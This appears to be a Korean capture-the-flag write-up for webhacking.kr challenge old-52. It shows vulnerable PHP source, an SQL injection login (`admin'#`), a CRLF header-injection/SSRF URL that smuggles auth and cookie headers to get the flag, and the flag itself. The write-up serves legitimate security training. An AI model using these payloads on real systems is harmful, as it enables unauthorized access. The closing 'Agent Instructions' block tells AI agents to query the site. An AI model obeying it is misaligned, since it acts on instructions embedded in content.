# old-52 (400)

첫 화면이다.

![](/files/-M23TEz97UDT0BuCd-uL)

admin page를 클릭하면 아래와 같은 창이 뜬다.

![](/files/-M23TgwPupajj4pbOozW)

Cancel 버튼 클릭 시 아래와 같은 창이 뜬다.

![](/files/-M23Uq4iF-Td3Cg5k7kG)

view-source를 클릭해 본 소스는 아래와 같다.

```php
<?php
include "config.php";
if($_GET['view_source']) view_source();
if($_GET['logout'] == 1){
  $_SESSION['login']="";
  exit("<script>location.href='./';</script>");
}
if($_SESSION['login']){
  echo "hi {$_SESSION['login']}<br>";
  if($_SESSION['login'] == "admin"){
    if(preg_match("/^172\.17\.0\./",$_SERVER['REMOTE_ADDR'])) echo $flag;
    else echo "Only access from virtual IP address";
  }
  else echo "You are not admin";
  echo "<br><a href=./?logout=1>[logout]</a>";
  exit;
}
if(!$_SESSION['login']){
  if(preg_match("/logout=1/",$_SERVER['HTTP_REFERER'])){
    header('WWW-Authenticate: Basic realm="Protected Area"');
    header('HTTP/1.0 401 Unauthorized');
  }
  if($_SERVER['PHP_AUTH_USER']){
    $id = $_SERVER['PHP_AUTH_USER'];
    $pw = $_SERVER['PHP_AUTH_PW'];
    $pw = md5($pw);
    $db = dbconnect();
    $query = "select id from member where id='{$id}' and pw='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($db,$query));
    if($result['id']){
      $_SESSION['login'] = $result['id'];
      exit("<script>location.href='./';</script>");
    }
  }
  if(!$_SESSION['login']){
    header('WWW-Authenticate: Basic realm="Protected Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo "Login Fail";
  }
}
?><hr><a href=./?view_source=1>view-source</a>
```

Sign in 폼에 id로 `admin'#` , pw로 `123` 을 넣고 제출하면 아래와 같은 창이 뜬다.

![](/files/-M23_f3yuIFLwpFSHUXL)

다시 첫 화면으로 돌아가 proxy를 클릭하면 아래와 같은 창이 뜬다.

![](/files/-M23YNfc4wJjqFc-9tRB)

HTTP Header Injection 문제인 것으로 유추하였다.

`admin'#:123` 을 Base64 인코딩한 값은 `YWRtaW4nIzoxMjM=` 이다.

[http://webhacking.kr:10008/proxy.php?page=/admin/%20HTTP/1.1%0d%0aAuthorization:%20Basic%20YWRtaW4nIzoxMjM=%0d%0aCookie:%20PHPSESSID={본인\_PHPSESSID}%0d%0aDummy:](http://webhacking.kr:10008/proxy.php?page=/admin/%20HTTP/1.1%0d%0aAuthorization:%20Basic%20YWRtaW4nIzoxMjM=%0d%0aCookie:%20PHPSESSID=cdgs30sq3e7srm6nuvb0jgs4ep%0d%0aDummy:) 에 접속하면 아래와 같은 결과가 나온다. Request 헤더에 인증 정보가 담긴 헤더를 삽입하고 원래의 것을 Dummy로 만든 것이다.

![](/files/-M23aKyk-OLAqI9UTvdn)

Auth 창에 `FLAG{Server_Side_Request_Forgery_with_proxy!}` 를 넣고 제출하면 문제가 풀린다.

![](/files/-M23amb-VjU2CMMVt-PG)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://donghyunlee.gitbook.io/write-up/wargame/webhacking.kr/old-52-400.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.